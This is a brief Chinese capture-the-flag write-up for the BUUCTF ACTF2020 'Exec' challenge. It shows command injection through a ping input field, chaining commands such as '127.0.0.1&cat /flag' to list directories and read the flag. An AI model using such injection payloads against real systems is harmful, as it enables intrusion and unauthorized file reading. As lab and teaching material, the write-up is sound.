首页 > 其他分享> > BUUCTF-[ACTF2020 新生赛]Exec 1 BUUCTF-[ACTF2020 新生赛]Exec 1 2022-02-28 18:03:38 作者:互联网 BUUCTF-[ACTF2020 新生赛]Exec 1 wp 打开之后 看来是一道命令注入的题啊,打开f12看看有没有惊喜? 看了,没有 输入127.0.0.1 发现是post请求 这种题,就是看看它过滤了什么,然后构造payload 输入127.0.0.1&ls 输入127.0.0.1&ls / 看根目录 输入127.0.0.1&cat /flag 明白了,什么都没有过滤 标签:ACTF2020,BUUCTF,Exec,0.1,127.0,ls,输入 来源: https://www.cnblogs.com/Q-and-K/p/15946802.html